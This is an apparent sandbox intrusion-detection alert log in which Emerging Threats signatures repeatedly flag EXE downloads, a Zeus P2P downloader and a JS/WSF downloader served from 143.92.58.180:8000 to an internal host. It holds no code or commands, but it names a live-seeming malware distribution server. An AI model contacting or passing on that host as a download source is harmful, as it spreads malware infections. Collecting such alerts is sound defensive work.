TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49259 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49195 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49195 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49195 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49195 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49195 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49195 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49195 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49766 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49766 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49766 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49766 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49766 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49766 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49766 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49192 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49192 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49192 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49192 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49192 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49487 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49487 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49487 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49192 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49487 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49192 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49487 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49487 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49487 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49242 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49242 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49242 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49242 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49242 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49242 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49242 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49347 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49347 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49347 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49347 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49347 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49347 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49347 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49559 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49559 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49559 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49559 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49559 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49559 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49559 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49202 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49202 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49202 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49202 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49202 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49202 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49588 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49202 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49588 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49588 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49588 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49588 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49588 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49588 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49731 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49731 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49731 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49731 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49731 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49731 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49731 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49285 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49285 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49285 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49285 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49285 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49285 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49285 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49367 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49367 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49367 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49577 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49367 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49577 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49367 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49577 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49367 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49577 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49367 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49577 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49577 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49577 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49215 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49215 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49168 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49215 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49168 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49215 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49168 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49215 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49168 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49215 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49168 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49215 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49168 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49168 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49755 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49755 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49755 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49755 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49755 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49755 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49755 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49500 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49500 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49500 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49500 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49500 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49500 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49500 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49599 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49277 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49599 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49277 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49599 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49277 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49599 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49277 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
